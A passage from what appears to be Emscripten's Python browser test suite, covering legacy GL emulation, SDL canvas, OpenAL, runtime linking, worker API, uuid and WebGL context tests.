self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
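# Build supp.c as a standalone side module, then have the main module build (MAIN_MODULE=2) link against
# supp.wasm at runtime.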
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-s', 'MAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-s', 'EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-s', 'USE_PTHREADS', '-s', 'BUILD_AS_WORKER=1'])
self.assertContained('error: USE_PTHREADS + BUILD_AS_WORKER require separate modes that don\'t work together, see https://github.com/emscripten-core/emscripten/issues/8854', stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-s', 'MAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
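# Illustrative sketch (not part of the test suite): the libuuid usage that
# uuid/test.c ultimately exercises boils down to C like the following,
# assuming the standard uuid_generate/uuid_unparse API from <uuid/uuid.h>:
#
#   #include <uuid/uuid.h>
#   #include <stdio.h>
#
#   int main() {
#     uuid_t id;
#     char text[37];        // 36 characters plus NUL for the canonical form
#     uuid_generate(id);    // randomness comes from getRandomValues/randomBytes in JS
#     uuid_unparse(id, text);
#     printf("%s\n", text);
#     return 0;
#   }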
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest_exit(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
